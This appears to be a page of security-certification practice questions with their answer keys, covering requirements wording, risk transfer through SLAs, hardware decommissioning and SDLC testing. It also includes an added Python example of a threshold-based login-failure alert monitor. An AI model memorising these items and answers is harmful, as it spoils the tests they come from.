Statement: "The system shall implement measures to notify system administrators prior to a security incident occurring." Which of the following BEST restates the above statement to allow it to be implemented by a team of software developers? A. The system shall cease processing data when certain configurable events occur. B. The system shall continue processing in the event of an error and email the security administrator the error logs. C. The system shall halt on error. D. The system shall throw an error when specified incidents pass a configurable threshold.
D. The system shall throw an error when specified incidents pass a configurable threshold.
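An added example (not from the original question set) of what the restated requirement looks like once a developer implements it: a monitor that counts specified events inside a configurable time window and raises an alert when the count passes a configurable threshold. The log format, event names, threshold and window are assumptions for illustration, and the log lines are constructed.

```python
import re
from collections import deque
from datetime import datetime, timedelta

# Assumed log format: "<ISO timestamp> <EVENT> <details>" (constructed for this example).
LOG_RE = re.compile(r"^(\S+) (\S+) (.*)$")


class ThresholdMonitor:
    """Alerts when at least `threshold` watched events occur within `window`."""

    def __init__(self, watched, threshold, window):
        self.watched = set(watched)
        self.threshold = threshold
        self.window = window
        self._times = deque()  # timestamps of watched events still inside the window

    def observe(self, ts, event):
        """Record one event; return an alert string if the threshold is passed, else None."""
        if event not in self.watched:
            return None
        self._times.append(ts)
        # Drop events that have aged out of the window.
        while self._times and ts - self._times[0] > self.window:
            self._times.popleft()
        if len(self._times) >= self.threshold:
            count = len(self._times)
            self._times.clear()  # one burst produces one alert, not one per extra event
            return f"ALERT: {count} {event} events within {self.window}"
        return None


def scan(lines, monitor):
    """Feed parsed log lines to the monitor; return [(timestamp, alert), ...]."""
    alerts = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # malformed line: skipped here, would be logged in production
        ts = datetime.fromisoformat(m.group(1))
        alert = monitor.observe(ts, m.group(2))
        if alert:
            alerts.append((ts, alert))
    return alerts


def detect_bruteforce(lines, threshold=5, window_seconds=60):
    """Convenience wrapper: AUTH_FAIL bursts with configurable threshold and window."""
    monitor = ThresholdMonitor({"AUTH_FAIL"}, threshold, timedelta(seconds=window_seconds))
    return scan(lines, monitor)


# Constructed sample log: five failures in 30 seconds, then one isolated failure.
SAMPLE_LOG = [
    "2024-03-01T10:00:01 AUTH_FAIL user=bob",
    "2024-03-01T10:00:05 AUTH_FAIL user=bob",
    "2024-03-01T10:00:09 AUTH_OK user=alice",
    "2024-03-01T10:00:12 AUTH_FAIL user=bob",
    "2024-03-01T10:00:20 AUTH_FAIL user=bob",
    "2024-03-01T10:00:31 AUTH_FAIL user=bob",
    "2024-03-01T10:15:00 AUTH_FAIL user=bob",
]

if __name__ == "__main__":
    for ts, alert in detect_bruteforce(SAMPLE_LOG):
        print(ts.isoformat(), alert)
```

Both the threshold and the window are parameters rather than constants, which is what makes the requirement testable: the same input produces an alert with a 60-second window and none with a 10-second one.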
A business is currently in the process of upgrading its network infrastructure to accommodate a personnel growth of over fifty percent within the next six months. All preliminary planning has been completed and a risk assessment plan is being adopted to decide which security controls to put in place throughout each phase. Which of the following risk responses is MOST likely being considered if the business is creating an SLA with a third party? A. Accepting risk B. Mitigating risk C. Identifying risk D. Transferring risk
D. Transferring risk
An Information Security Officer (ISO) has asked a security team to randomly retrieve discarded computers from the warehouse dumpster. The security team was able to retrieve two older computers and a broken MFD network printer. The security team was able to connect the hard drives from the two computers and the network printer to a computer equipped with forensic tools. The security team was able to retrieve PDF files from the network printer hard drive but the data on the two older hard drives was inaccessible. Which of the following should the Warehouse Manager do to remediate the security issue? A. Revise the hardware and software maintenance contract. B. Degauss the printer hard drive to delete data. C. Implement a new change control process. D. Update the hardware decommissioning procedures.
D. Update the hardware decommissioning procedures.
A company which manufactures ASICs for use in an IDS wants to ensure that the ASICs' code is not prone to buffer and integer overflows. The ASIC technology is copyrighted and the confidentiality of the ASIC code design is exceptionally important. The company is required to conduct internal vulnerability testing as well as testing by a third party. Which of the following should be implemented in the SDLC to achieve these requirements? A. Regression testing by the manufacturer and integration testing by the third party B. User acceptance testing by the manufacturer and black box testing by the third party C. Defect testing by the manufacturer and user acceptance testing by the third party D. White box unit testing by the manufacturer and black box testing by the third party
D. White box unit testing by the manufacturer and black box testing by the third party